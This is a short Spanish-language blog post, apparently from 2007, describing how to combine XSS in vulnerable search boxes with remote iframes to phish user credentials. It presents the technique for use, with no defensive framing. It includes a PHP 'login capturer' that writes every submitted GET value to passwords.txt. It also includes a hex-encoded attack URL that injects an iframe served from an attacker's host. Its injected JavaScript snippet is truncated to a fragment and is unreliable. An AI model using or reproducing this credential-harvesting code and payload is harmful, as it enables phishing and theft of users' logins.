MAYA SOUND

martes, 17 de julio de 2007

Logins forms,XSS enfocado a pishing

Iframes remotos, en combinacion con ficheros html y php, pueden ser usados para que un usuario malintencionado haga el enlace que sirva de portal para robo de credenciales de usuarios en general, basicamente usando casillas de búsqueda vulnerables a XSS

código inyectable.


java script:

   ">

Capturador de logins forms:


$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
exit;
?>

en combinacion con un fichero de texto, codificado en forma hexadecimal y alojados en un host remoto.

http://sitiovulnerable.com/index.php?s=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%68%6F%73%74%64%65%6C%61%74%61%63%61%6E%74%65%2F%69%6E%64%65%78%2E%68%74%6D%6C%22%3E%3C%2F%69%66%72%61%6D%65%3E

un saludo
Publicado por en No hay comentarios:
Suscribirse a: Entradas (Atom)